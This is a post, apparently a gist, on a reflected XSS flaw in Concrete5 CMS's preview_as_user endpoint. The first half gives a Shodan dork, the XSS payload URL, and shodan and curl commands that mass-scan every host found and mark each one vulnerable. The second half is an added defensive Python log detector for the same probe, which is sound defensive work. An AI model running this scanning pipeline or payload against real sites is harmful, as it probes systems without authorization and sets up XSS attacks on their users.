Created
January 6, 2022 14:38
Concrete5 CMS XSS vulnerability tweet by Jackson
Shodan Dork : 'Set-Cookie: CONCRETE5'
Vulnerable URL :
https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)>
Using the command below we can download the results (a Shodan Premium API key is needed).
shodan download concrete5 'Set-Cookie: CONCRETE5'
I already downloaded the results using the shodan CLI command.
We will separate the IP:PORT from the Shodan results. For this we will use the shodan parse command along with awk.
shodan parse concrete5.json.gz --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a shodan-ip.txt
We will use the process below to automate the findings.
cat shodan-ip.txt | while read host do ; do curl --silent --path-as-is --insecure "https://$host/ccm/system/panels/page/preview_as_user/preview?cID=%22%3E%3C/iframe%3E%3Cimg/src/onerror=.1|alert(document.domain)%3E" | grep -qs '"></iframe><img/src/onerror=.1|alert(document.domain)>' && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done
Check the Vulnerable URL
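
Seen from the server side, this probe leaves a recognizable trace in the access log. The following is an added example, not part of the original gist: it flags requests to the preview endpoint whose cID is not a plain number. It assumes combined-format access logs and that a legitimate cID is a numeric page ID; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint path taken from the vulnerable URL shown on this page.
PREVIEW_PATH = "/ccm/system/panels/page/preview_as_user/preview"

# Client IP and request target from a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_cid(line):
    """Return (client_ip, decoded_cID) when the line requests the preview
    endpoint with a non-numeric cID, otherwise None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # endswith() also matches installs under a subdirectory or /index.php (assumption).
    if not url.path.rstrip("/").endswith(PREVIEW_PATH):
        return None
    # parse_qs percent-decodes values, so %22%3E and a raw "> compare equal here.
    for value in parse_qs(url.query, keep_blank_values=True).get("cID", []):
        if not value.isdigit():  # assumption: a legitimate cID is a numeric page ID
            return m.group("ip"), value
    return None


def scan(lines):
    """Return every (client_ip, decoded_cID) hit found in the given log lines."""
    return [hit for hit in map(suspicious_cid, lines) if hit]


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Jan/2022:14:40:01 +0000] "GET /ccm/system/panels/page/preview_as_user/preview?cID=%22%3E%3C/iframe%3E%3Cimg/src/onerror=.1|alert(document.domain)%3E HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '203.0.113.20 - - [06/Jan/2022:14:41:10 +0000] "GET /ccm/system/panels/page/preview_as_user/preview?cID=153 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.21 - - [06/Jan/2022:14:42:30 +0000] "GET /index.php?cID=%3Cb%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent a non-numeric cID to the preview endpoint: {value!r}")
```

A hit only shows that the endpoint was probed; whether the value was reflected unescaped depends on the installed Concrete5 version.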